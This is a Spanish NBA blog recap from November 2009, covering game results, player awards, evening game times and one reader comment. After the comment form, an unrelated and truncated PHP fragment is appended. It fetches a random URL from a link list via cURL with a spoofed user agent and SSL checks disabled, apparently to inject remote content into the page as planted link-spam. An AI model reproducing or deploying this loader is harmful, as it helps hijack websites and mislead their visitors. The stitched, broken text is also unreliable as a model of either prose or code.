La Crónica (21/11/2009)

22 de November de 2009 por Viva_Dirk

Una noche con 9 partidos da para mucho, incluso sin grandes duelos. Pudimos ver como los Nets se colocan con un nefasto balance de 0-13 perdiendo anoche contra el vecino rico, aunque por fin intuyen una buena noticia, en la vuelta de Devin Harris. Por su parte, los Cavs tuvieron que sudar y defender a muerte en el último cuarto para ganar a unos Sixers donde parece que Brand despierta, anoche 18-14.

Los Spurs apalizaron a los Wizards sin problemas con 10 jugadores jugando más de 20 minutos. En Washington no han notado demasiado la vuelta de Arenas y, aunque aún no han jugado con toda la plantilla al completo, siguen siendo un equipo poco competitivo. Otro serio correctivo fue el que le endosó Portland a los Wolves, con la ‘vieja novedad’ de ver a Miller saliendo desde el banco. Anoche el 9º en minutos jugados.

En dos de los duelos mas interesantes de la noche, Denver pasó por encima de Chicago en los cuartos pares con otro gran partido de Carmelo, esta vez bien secundado por Billups. Mientras los Jazz se trabajaban una victoria en la prórroga frente a Detroit. Fueron claves la mayor circulación del balón de los de Sloan y el resurgir de Kirilenko.

La sorpresa de la noche fue la victoria de los Hornets frente a los Hawks que perdieron a Bibby después de 5 minutos de juego. Los Bucks siguen cosechando victorias sin Redd, anoche frente a Memphis. Y Houston sigue guerreando todo lo que puede, lo que ayer le valió la victoria frente a los Kings que no pudieron contar con Tyreke Evans.

PREMIOS TJNBA

MVP: Este año sí está jugando como un MVP el señor Carmelo Anthony, que destrozó a los Bulls con 30 puntos, 11 rebotes y 7 asistencias. Su compañero y jefe de generación no anduvo lejos con 32 puntos, 7 rebotes y 9 asistencias. Seguro que no necesitáis que os diga su nombre.

Rookie: Va de bases lo de esta hornada. Esta vez es Darren Collison el que se cuela aquí, y es que sustituyendo a Chris Paul llevó a los Hornets a ganar al líder del Este con 22 puntos y 11 asistencias, bien acompañado por M.Thornton con 21 puntos. Jennings sigue muy consistente, anoche fueron 26 puntos. O.Casspi se ha hecho con un hueco en los Kings y no es para menos, ayer 17 puntos y 8 rebotes. También merecen mención Taj Gibson y Chase Budinger.

Sorpresa: Partidazo de Webster, que además de anotar 21 puntos fue el máximo reboteador del partido con 13 rebotes. Buen partido de Luke Ridnour que parece entenderse bien con Jennings. Desde luego talento no le falta.

Decepción: Caron Butler en 32 minutos anotó 8 puntos, cogió 5 rebotes y falló 6 de sus 9 tiros, muy por debajo de su nivel. Los Bulls echaron de menos a John Salmons, que estuvo 28 minutos en cancha para meter 5 puntos con un 2 de 11 en tiros.

MEV: Muchos candidatos y ninguno destacado, os dejamos que elijais el vuestro entre Rose con 28 puntos y 6 rebotes, Gordon con 25-5, Hawes 24-9 y Rudy Gay 24-10.

RAZONES PARA TRASNOCHAR

Hoy tenemos a 3 de los favoritos al anillo en liza, lo que ya sería razón suficiente para robar unas horas de sueño. Por suerte no tendremos que trasnochar mucho para ver el Magics-Raptors a las 18:30 y el Celtics-Knicks a las 19 horas. Sí que hay que dejar de dormir un poco más para ver el Thunders-Lakers a las 3:30 h.

Comenta

Un comentario a esta entrada

  1. Uno cualquiera dice:
    #1

    Juraría que el título está mal y que la crónica es del 21.

    Por lo demás, excelente como siempre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>